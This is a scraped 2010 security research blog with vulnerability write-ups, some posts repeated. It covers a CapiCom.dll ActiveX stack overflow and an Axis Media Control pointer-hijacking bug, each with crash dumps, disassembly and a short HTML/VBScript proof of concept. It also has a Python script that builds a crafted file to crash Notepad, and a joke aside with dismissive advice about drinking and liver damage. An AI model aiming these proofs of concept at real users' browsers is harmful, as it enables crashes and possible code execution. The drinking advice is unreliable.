It's holiday time, so here it is a present for you! More informations (and investigations) will be available on September.
Just run the script and open the file "test.txt" with notepad.exe
# python
byte_01 = "\x00"
byte_02 = (
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41"
)
byte_03 = "\x02"
byte_04 = "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42"
byte_05 = "\x03"
byte_06 = (
"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43"
"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43"
"\x43\x43\x43\x43\x43\x43\x43\x43\x43"
)
byte_07 = "\x04"
byte_08 = (
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44"
)
byte_09 = "\x05"
byte_10 = "\x45\x45\x45"
byte_11 = "\x06"
IpackIt = (
byte_01 +
byte_02 +
byte_03 +
byte_04 +
byte_05 +
byte_06 +
byte_07 +
byte_08 +
byte_09 +
byte_10 +
byte_11
)
mHandle = open('test.txt', 'w')
mHandle.write(IpackIt)
mHandle.close()
venerdì 6 agosto 2010
venerdì 16 luglio 2010
venerdì 2 luglio 2010
#1 - Microsoft CapiCom OID Class Remote Stack Overflow
------------------------------------------------------------------------------------------------------------------------------
INFO:
------------------------------------------------------------------------------------------------------------------------------
Platform: Microsoft Windows 7 Professional
6.1.7600 N/D build 7600
File: CapiCom.dll
Ver.: 2.1.0.2
ProgID: CAPICOM.OID.1
Descr.: OID Class
GUID: {7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C}
MD5: 9130cce19b5db3d2e31f9f789263fc4a
Marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
Description: The above file is vulnerable to a stack-based buffer overflow by assigning an overly string to the "Value"
(Property Let Value As String) property.
This could compromise a user's system.
See below for a proof of concept
Mitigation: A stack-canary protection seems to be used to protect against arbitrary code execution (see below)
------------------------------------------------------------------------------------------------------------------------------
FAULTMON REPORT
------------------------------------------------------------------------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:25.877 pid=0A5C tid=08EC Thread exited with code 3221225725
------------------------------------------------------------------------------------------------------------------------------
SUBROUTINE
------------------------------------------------------------------------------------------------------------------------------
.text:0043177A align 10h
.text:00431780
.text:00431780 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00431780
.text:00431780
.text:00431780 __chkstk proc near ; CODE XREF: ATL::_ATL_SAFE_ALLOCA_IMPL::_Atlresetstkoflw(void)+32 p
.text:00431780 ; IPromptUser::GetDomainAndScheme(ushort *,ushort * *,INTERNET_SCHEME *)+A p ...
.text:00431780 push ecx
.text:00431781 lea ecx, [esp+4]
.text:00431785 sub ecx, eax
.text:00431787 sbb eax, eax
.text:00431789 not eax
.text:0043178B and ecx, eax
.text:0043178D mov eax, esp
.text:0043178F and eax, 0FFFFF000h
.text:00431794
.text:00431794 loc_431794: ; CODE XREF: __chkstk+29 j
.text:00431794 cmp ecx, eax
.text:00431796 jb short loc_4317A2
.text:00431798 mov eax, ecx
.text:0043179A pop ecx
.text:0043179B xchg eax, esp
.text:0043179C mov eax, [eax]
.text:0043179E mov [esp+0], eax
.text:004317A1 retn
.text:004317A2 ; ---------------------------------------------------------------------------
.text:004317A2
.text:004317A2 loc_4317A2: ; CODE XREF: __chkstk+16 j
.text:004317A2 sub eax, 1000h
.text:004317A7 test [eax], eax ; <-- CRASH OCCURS HERE
.text:004317A9 jmp short loc_431794
.text:004317A9 __chkstk endp
.text:004317A9
.text:004317A9 ; ---------------------------------------------------------------------------
.text:004317AB align 10h
------------------------------------------------------------------------------------------------------------------------------
STACK-CANARY PROTECTION (?)
------------------------------------------------------------------------------------------------------------------------------
.text:0041F281 arg_4 = dword ptr 0Ch
.text:0041F281 arg_8 = dword ptr 10h
.text:0041F281 arg_C = dword ptr 14h
.text:0041F281
.text:0041F281 mov edi, edi
.text:0041F283 push ebp
.text:0041F284 mov ebp, esp
.text:0041F286 mov eax, 1290h
.text:0041F28B call __chkstk
.text:0041F290 mov eax, ___security_cookie
------------------------------------------------------------------------------------------------------------------------------
PROOF OF CONCEPT
------------------------------------------------------------------------------------------------------------------------------
<html>
<object classid='clsid:7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C' id='test'></object>
<script language = 'vbscript'>
buff = String(2097512, "A")
test.Value = buff
</script>
</html>
------------------------------------------------------------------------------------------------------------------------------
END
------------------------------------------------------------------------------------------------------------------------------
INFO:
------------------------------------------------------------------------------------------------------------------------------
Platform: Microsoft Windows 7 Professional
6.1.7600 N/D build 7600
File: CapiCom.dll
Ver.: 2.1.0.2
ProgID: CAPICOM.OID.1
Descr.: OID Class
GUID: {7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C}
MD5: 9130cce19b5db3d2e31f9f789263fc4a
Marked as: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
Description: The above file is vulnerable to a stack-based buffer overflow by assigning an overly string to the "Value"
(Property Let Value As String) property.
This could compromise a user's system.
See below for a proof of concept
Mitigation: A stack-canary protection seems to be used to protect against arbitrary code execution (see below)
------------------------------------------------------------------------------------------------------------------------------
FAULTMON REPORT
------------------------------------------------------------------------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:24.639 pid=0A5C tid=0688 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
EAX=02BC2000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=0224B1EC: 60 86 B0 60 86 B0 60 86-B0 60 86 B0 5E 86 AE 5E
EDX=07B40026: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
ESP=02DBCCF8: 5A 72 3F 75 B5 3C 14 63-5A 48 2A FC 78 CD DB 02
EBP=02DBCD28: 44 CD DB 02 C3 3E B8 75-44 0A 6A 05 24 00 B4 07
ESI=056A0A44: 2C 22 12 63 18 22 12 63-01 00 00 00 02 00 00 00
EDI=00B71B02: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=631517A7: 85 00 EB E9 CC CC CC CC-CC 68 10 18 15 63 64 FF
--> TEST [EAX],EAX
----------------------------------------------------------------
16:22:25.877 pid=0A5C tid=08EC Thread exited with code 3221225725
------------------------------------------------------------------------------------------------------------------------------
SUBROUTINE
------------------------------------------------------------------------------------------------------------------------------
.text:0043177A align 10h
.text:00431780
.text:00431780 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00431780
.text:00431780
.text:00431780 __chkstk proc near ; CODE XREF: ATL::_ATL_SAFE_ALLOCA_IMPL::_Atlresetstkoflw(void)+32 p
.text:00431780 ; IPromptUser
.text:00431780 push ecx
.text:00431781 lea ecx, [esp+4]
.text:00431785 sub ecx, eax
.text:00431787 sbb eax, eax
.text:00431789 not eax
.text:0043178B and ecx, eax
.text:0043178D mov eax, esp
.text:0043178F and eax, 0FFFFF000h
.text:00431794
.text:00431794 loc_431794: ; CODE XREF: __chkstk+29 j
.text:00431794 cmp ecx, eax
.text:00431796 jb short loc_4317A2
.text:00431798 mov eax, ecx
.text:0043179A pop ecx
.text:0043179B xchg eax, esp
.text:0043179C mov eax, [eax]
.text:0043179E mov [esp+0], eax
.text:004317A1 retn
.text:004317A2 ; ---------------------------------------------------------------------------
.text:004317A2
.text:004317A2 loc_4317A2: ; CODE XREF: __chkstk+16 j
.text:004317A2 sub eax, 1000h
.text:004317A7 test [eax], eax ; <-- CRASH OCCURS HERE
.text:004317A9 jmp short loc_431794
.text:004317A9 __chkstk endp
.text:004317A9
.text:004317A9 ; ---------------------------------------------------------------------------
.text:004317AB align 10h
------------------------------------------------------------------------------------------------------------------------------
STACK-CANARY PROTECTION (?)
------------------------------------------------------------------------------------------------------------------------------
.text:0041F281 arg_4 = dword ptr 0Ch
.text:0041F281 arg_8 = dword ptr 10h
.text:0041F281 arg_C = dword ptr 14h
.text:0041F281
.text:0041F281 mov edi, edi
.text:0041F283 push ebp
.text:0041F284 mov ebp, esp
.text:0041F286 mov eax, 1290h
.text:0041F28B call __chkstk
.text:0041F290 mov eax, ___security_cookie
------------------------------------------------------------------------------------------------------------------------------
PROOF OF CONCEPT
------------------------------------------------------------------------------------------------------------------------------
<html>
<object classid='clsid:7BF3AC5C-CC84-429A-ACA5-74D916AD6B8C' id='test'></object>
<script language = 'vbscript'>
buff = String(2097512, "A")
test.Value = buff
</script>
</html>
------------------------------------------------------------------------------------------------------------------------------
END
------------------------------------------------------------------------------------------------------------------------------
mercoledì 23 giugno 2010
AXIS Media Control Embedded Pointer Highjacking
First of all, I would like to sincerely thank the (un)cooperation of Axis Communications, now bug info:
File:
AxisMediaControlEmb.dll
Version:
5.8.5.3
ProgID:
AxisMediaControlEmb.AxisMediaControlEmb.1
GUID:
{DE625294-70E6-45ED-B895-CFFA13AEB044}
Description:
AxisMediaControlEmb Class
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Proof of concept:
<html>
<object classid='clsid:DE625294-70E6-45ED-B895-CFFA13AEB044' id='test'></object>
<script language = 'vbscript'>
test.SetImage 1094795585 ,2147483646
</script>
</html>
Info (https://www.axis.com/corporate/index.htm):
Axis is an IT company offering network video solutions for professional installations.
The company is the global market leader in network video, driving the ongoing shift from analog to digital video surveillance.
Axis develops and marketing innovative network video products i.e. surveillance cameras for installations in schools, in retail, on buses and trains, and for public surveillance.
Founded in 1984.
Worldwide presence in more than 20 countries, 774 employees*.
Global partnerships through distributors, resellers and system integrators in more than 70 countries.
Net sales in 2009: SEK 2 301 M (US$340M).
Listed on NASDAQ OMX Stockholm under the ticker AXIS.
Timetable:
Mon, 14 Jun 2010 -> Vendor contacted
Mon, 14 Jun 2010 <- Vendor opened case 215039
Mon, 14 Jun 2010 <- Vendor asks more info about the vulnerable product
Mon, 14 Jun 2010 -> More info sent to the Vendor
Wed, 16 Jun 2010 -> No more info from Vendor, notified a scheduled public disclosure for Thu, 17 Jun 2010
Wed, 16 Jun 2010 <- Vendor confirmed they are working on the bug but asks more detail on how to reproduce it
Wed, 16 Jun 2010 -> Detailed bug report + proof of concept sent to Vendor
Wed, 16 Jun 2010 <- Vendor required to coordinate a public disclosure
Thu, 17 Jun 2010 -> Asked about how many time they need to patch the vulnerability
Thu, 17 Jun 2010 <- Mr Fredrik Bergstrand (technical lead for Axis Media Control) pointed me out that invalid pointer is not a security risk
Fri, 18 Jun 2010 -> Asked Mr Fredrik Bergstrand to forgive my "title mistake". Sent other details to demonstrate that code execution is possible. Renamed vulnerability in "Pointer Highjacking rather than memory corruption". I begin to doubt they've read my previous reports...
Mon, 21 Jun 2010 <- Vendor ask for a day or two for vulnerability investigation...
Wed, 23 Jun 2010 -> Requested about investigation status
Wed, 23 Jun 2010 <- Another funny answer from the Vendor
Wed, 23 Jun 2010 -> Public disclosure
Fun:
Microsoft seems to use Axis products
http://research.microsoft.com/en-us/projects/espproject/meeting-090224.jpg
Scenario:
Drinking a six-pack of beer four nights a week... with the nights spread out through the week. No other drinking or drugs involved. I also drink lots of water with lemon juice and take milk thistle every day.
For a 30-year-old male, otherwise healthy, what kind of liver damage is likely in a situation like that? I realize that everyone is different.
Answer:
Your mind is the largest factor that will ever contribute to your health. If you have a healthy mind and see yourself as being healthy, you will have a healthy body.
Beer does take a toll on your liver but so does a lot of other consumables. Your body is built to take care of itself. If you give it a break to do so and have a healthy mind, you will be a healthy person.
You like beer, great. You don't drink it every day, its a pleasure, not a habit. You give yourself a break from it and your body has a chance to stabilize itself.
If its a pleasure that isn't taking a toll on another part of your life, enjoy it. Don't worry about it. Worry is the real killer and he never gets caught.
Ops!:
Wrong scenario and wrong answer, anyway I really love who responded (ok, ok, I'm joking, always drink responsibly or rather don't drink at all... and so on...)
What happen?:
This control contains two bugs (the first one is simply a denial of service). Vulnerable functions are:
Sub GetCurrentImage (
ByVal theFormat As Long,
ByRef theBuffer As Variant,
ByRef theBufferSize As Long
)
and
Sub SetImage (
ByRef theImage As Variant,
ByRef theSize As Long
)
We'll analyze the “SetImage()” function, which is the one who is vulnerable to memory corruption.
This sub accepts two parameters; the first one (“Variant” type) is used to store something apparently unknown.
The second one just sets the size of the image to load.
Taking a closer look to the code (that starts here 0x1007A0AF and has a length of 196 bytes) it's easy to see that the real problem is here:
.text:1007A0F9
.text:1007A0F9 loc_1007A0F9: ; CODE XREF: sub_1007A0AF+41#j
.text:1007A0F9 push edi
.text:1007A0FA mov edi, [ebp+arg_4] <- theImage value
.text:1007A0FD lea eax, [ebp+ppvData] <- theSize value
.text:1007A100 push eax ; ppvData <- load theSize
.text:1007A101 push dword ptr [edi+8] ; psa <- load theImage
.text:1007A104 call ds:SafeArrayAccessData <- call oleaut32.dll
So what? Could we suppose that the ”SetImage” parameter will contain a pointer that will be passed to “SafeArraYAccessData” function? And if so, will this component check the pointer?
The answer to our first question is yes. Before answering the second one, let's take a look at Microsoft function. In fact, according to http://msdn.microsoft.com/en-us/library/ms891243.aspx
The first thing we noticed is that AxisMediaControlEmb.dll never creates an array descriptor through the “SafeArrayCreate” function:
Imported functions (ordered by address and some omissis for improve readibility):
100C8000 OpenProcessToken ADVAPI32
... ... ...
100C8354 23 SafeArrayAccessData OLEAUT32
100C8358 24 SafeArrayUnaccessData OLEAUT32
100C835C 4 SysAllocStringLen OLEAUT32
100C8360 417 OleCreatePropertyFrame OLEAUT32
100C8364 162 LoadRegTypeLib OLEAUT32
100C8368 277 VarUI4FromStr OLEAUT32
100C836C 163 RegisterTypeLib OLEAUT32
100C8370 186 UnRegisterTypeLib OLEAUT32
100C8374 161 LoadTypeLib OLEAUT32
100C8378 411 SafeArrayCreateVector OLEAUT32
100C837C 7 SysStringLen OLEAUT32
100C8380 12 VariantChangeType OLEAUT32
100C8384 9 VariantClear OLEAUT32
100C8388 10 VariantCopy OLEAUT32
100C838C 8 VariantInit OLEAUT32
100C8390 149 SysStringByteLen OLEAUT32
100C8394 150 SysAllocStringByteLen OLEAUT32
100C8398 2 SysAllocString OLEAUT32
100C839C 6 SysFreeString OLEAUT32
100C83A0 200 GetErrorInfo OLEAUT32
100C83A4 146 DispCallFunc OLEAUT32
100C83AC ShellExecuteExA SHELL32
... ... ...
anyway, from oleaut32.dll:
.text:6FC4E38C mov esi, [ebp+ppvData] <- theSize value
.text:6FC4E38F test esi, esi
.text:6FC4E391 jz loc_6FC67C94
.text:6FC4E397 mov edx, [ebp+psa]
.text:6FC4E39A push edx ; psa <- theImage value
.text:6FC4E39B call _SafeArrayLock@4 <- call oleaut32.dll
then (always oleaut32.dll):
.text:6FC4E14A mov edi, edi
.text:6FC4E14C push ebp
.text:6FC4E14D mov ebp, esp
.text:6FC4E14F mov ecx, [ebp+psa]
.text:6FC4E152 test ecx, ecx
.text:6FC4E154 jz loc_6FC67C76
.text:6FC4E15A mov eax, [ecx+8] <- CRASH
and could you imagine what will be EAX value? Here it is:
EAX 0012DE5C
ECX 41414141 <-------- mov eax, [ecx+8]
EDX 018C64C8
EBX 018C64AC
ESP 0012DE30
EBP 0012DE60
ESI 41414141
EDI 0012DE5C
Note that "41414141" is just the hexadecimal value of 1094795585, passed to theImage parameter, as follow:
<html>
<object classid='clsid:DE625294-70E6-45ED-B895-CFFA13AEB044' id='test'></object>
<script language = 'vbscript'>
test.SetImage 1094795585 ,2147483646
</script>
</html>
Be safe...
File:
AxisMediaControlEmb.dll
Version:
5.8.5.3
ProgID:
AxisMediaControlEmb.AxisMediaControlEmb.1
GUID:
{DE625294-70E6-45ED-B895-CFFA13AEB044}
Description:
AxisMediaControlEmb Class
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Proof of concept:
<html>
<object classid='clsid:DE625294-70E6-45ED-B895-CFFA13AEB044' id='test'></object>
<script language = 'vbscript'>
test.SetImage 1094795585 ,2147483646
</script>
</html>
Info (https://www.axis.com/corporate/index.htm):
Axis is an IT company offering network video solutions for professional installations.
The company is the global market leader in network video, driving the ongoing shift from analog to digital video surveillance.
Axis develops and marketing innovative network video products i.e. surveillance cameras for installations in schools, in retail, on buses and trains, and for public surveillance.
Founded in 1984.
Worldwide presence in more than 20 countries, 774 employees*.
Global partnerships through distributors, resellers and system integrators in more than 70 countries.
Net sales in 2009: SEK 2 301 M (US$340M).
Listed on NASDAQ OMX Stockholm under the ticker AXIS.
Timetable:
Mon, 14 Jun 2010 -> Vendor contacted
Mon, 14 Jun 2010 <- Vendor opened case 215039
Mon, 14 Jun 2010 <- Vendor asks more info about the vulnerable product
Mon, 14 Jun 2010 -> More info sent to the Vendor
Wed, 16 Jun 2010 -> No more info from Vendor, notified a scheduled public disclosure for Thu, 17 Jun 2010
Wed, 16 Jun 2010 <- Vendor confirmed they are working on the bug but asks more detail on how to reproduce it
Wed, 16 Jun 2010 -> Detailed bug report + proof of concept sent to Vendor
Wed, 16 Jun 2010 <- Vendor required to coordinate a public disclosure
Thu, 17 Jun 2010 -> Asked about how many time they need to patch the vulnerability
Thu, 17 Jun 2010 <- Mr Fredrik Bergstrand (technical lead for Axis Media Control) pointed me out that invalid pointer is not a security risk
Fri, 18 Jun 2010 -> Asked Mr Fredrik Bergstrand to forgive my "title mistake". Sent other details to demonstrate that code execution is possible. Renamed vulnerability in "Pointer Highjacking rather than memory corruption". I begin to doubt they've read my previous reports...
Mon, 21 Jun 2010 <- Vendor ask for a day or two for vulnerability investigation...
Wed, 23 Jun 2010 -> Requested about investigation status
Wed, 23 Jun 2010 <- Another funny answer from the Vendor
Wed, 23 Jun 2010 -> Public disclosure
Fun:
Microsoft seems to use Axis products
http://research.microsoft.com/en-us/projects/espproject/meeting-090224.jpg
Scenario:
Drinking a six-pack of beer four nights a week... with the nights spread out through the week. No other drinking or drugs involved. I also drink lots of water with lemon juice and take milk thistle every day.
For a 30-year-old male, otherwise healthy, what kind of liver damage is likely in a situation like that? I realize that everyone is different.
Answer:
Your mind is the largest factor that will ever contribute to your health. If you have a healthy mind and see yourself as being healthy, you will have a healthy body.
Beer does take a toll on your liver but so does a lot of other consumables. Your body is built to take care of itself. If you give it a break to do so and have a healthy mind, you will be a healthy person.
You like beer, great. You don't drink it every day, its a pleasure, not a habit. You give yourself a break from it and your body has a chance to stabilize itself.
If its a pleasure that isn't taking a toll on another part of your life, enjoy it. Don't worry about it. Worry is the real killer and he never gets caught.
Ops!:
Wrong scenario and wrong answer, anyway I really love who responded (ok, ok, I'm joking, always drink responsibly or rather don't drink at all... and so on...)
What happen?:
This control contains two bugs (the first one is simply a denial of service). Vulnerable functions are:
Sub GetCurrentImage (
ByVal theFormat As Long,
ByRef theBuffer As Variant,
ByRef theBufferSize As Long
)
and
Sub SetImage (
ByRef theImage As Variant,
ByRef theSize As Long
)
We'll analyze the “SetImage()” function, which is the one who is vulnerable to memory corruption.
This sub accepts two parameters; the first one (“Variant” type) is used to store something apparently unknown.
The second one just sets the size of the image to load.
Taking a closer look to the code (that starts here 0x1007A0AF and has a length of 196 bytes) it's easy to see that the real problem is here:
.text:1007A0F9
.text:1007A0F9 loc_1007A0F9: ; CODE XREF: sub_1007A0AF+41#j
.text:1007A0F9 push edi
.text:1007A0FA mov edi, [ebp+arg_4] <- theImage value
.text:1007A0FD lea eax, [ebp+ppvData] <- theSize value
.text:1007A100 push eax ; ppvData <- load theSize
.text:1007A101 push dword ptr [edi+8] ; psa <- load theImage
.text:1007A104 call ds:SafeArrayAccessData <- call oleaut32.dll
So what? Could we suppose that the ”SetImage” parameter will contain a pointer that will be passed to “SafeArraYAccessData” function? And if so, will this component check the pointer?
The answer to our first question is yes. Before answering the second one, let's take a look at Microsoft function. In fact, according to http://msdn.microsoft.com/en-us/library/ms891243.aspx
SafeArrayAccessData
This function increments the lock count of an array, and retrieves a pointer to the array data.
HRESULT SafeArrayAccessData(
SAFEARRAY FAR*
psa, void HUGEP* FAR* ppvData
);
Parameters psa [in] Pointer to an array descriptor created by SafeArrayCreate. ppvData [in] On exit, pointer to a pointer to the array data. ..
The first thing we noticed is that AxisMediaControlEmb.dll never creates an array descriptor through the “SafeArrayCreate” function:
Imported functions (ordered by address and some omissis for improve readibility):
100C8000 OpenProcessToken ADVAPI32
... ... ...
100C8354 23 SafeArrayAccessData OLEAUT32
100C8358 24 SafeArrayUnaccessData OLEAUT32
100C835C 4 SysAllocStringLen OLEAUT32
100C8360 417 OleCreatePropertyFrame OLEAUT32
100C8364 162 LoadRegTypeLib OLEAUT32
100C8368 277 VarUI4FromStr OLEAUT32
100C836C 163 RegisterTypeLib OLEAUT32
100C8370 186 UnRegisterTypeLib OLEAUT32
100C8374 161 LoadTypeLib OLEAUT32
100C8378 411 SafeArrayCreateVector OLEAUT32
100C837C 7 SysStringLen OLEAUT32
100C8380 12 VariantChangeType OLEAUT32
100C8384 9 VariantClear OLEAUT32
100C8388 10 VariantCopy OLEAUT32
100C838C 8 VariantInit OLEAUT32
100C8390 149 SysStringByteLen OLEAUT32
100C8394 150 SysAllocStringByteLen OLEAUT32
100C8398 2 SysAllocString OLEAUT32
100C839C 6 SysFreeString OLEAUT32
100C83A0 200 GetErrorInfo OLEAUT32
100C83A4 146 DispCallFunc OLEAUT32
100C83AC ShellExecuteExA SHELL32
... ... ...
anyway, from oleaut32.dll:
.text:6FC4E38C mov esi, [ebp+ppvData] <- theSize value
.text:6FC4E38F test esi, esi
.text:6FC4E391 jz loc_6FC67C94
.text:6FC4E397 mov edx, [ebp+psa]
.text:6FC4E39A push edx ; psa <- theImage value
.text:6FC4E39B call _SafeArrayLock@4 <- call oleaut32.dll
then (always oleaut32.dll):
.text:6FC4E14A mov edi, edi
.text:6FC4E14C push ebp
.text:6FC4E14D mov ebp, esp
.text:6FC4E14F mov ecx, [ebp+psa]
.text:6FC4E152 test ecx, ecx
.text:6FC4E154 jz loc_6FC67C76
.text:6FC4E15A mov eax, [ecx+8] <- CRASH
and could you imagine what will be EAX value? Here it is:
EAX 0012DE5C
ECX 41414141 <-------- mov eax, [ecx+8]
EDX 018C64C8
EBX 018C64AC
ESP 0012DE30
EBP 0012DE60
ESI 41414141
EDI 0012DE5C
Note that "41414141" is just the hexadecimal value of 1094795585, passed to theImage parameter, as follow:
<html>
<object classid='clsid:DE625294-70E6-45ED-B895-CFFA13AEB044' id='test'></object>
<script language = 'vbscript'>
test.SetImage 1094795585 ,2147483646
</script>
</html>
Be safe...
giovedì 17 giugno 2010
Waiting...
Update: Vendor asked more time to investigate the vulnerability...
I am in contact with a Vendor to whom I sent a vulnerability report, but I'm not sure whether or not they're kidding me, so, if no answer, Mon 21 Jun 2010 you will find on this blog a detailed report of the vulnerability.
Be safe
I am in contact with a Vendor to whom I sent a vulnerability report, but I'm not sure whether or not they're kidding me, so, if no answer, Mon 21 Jun 2010 you will find on this blog a detailed report of the vulnerability.
Be safe
martedì 15 giugno 2010
Iscriviti a:
Post (Atom)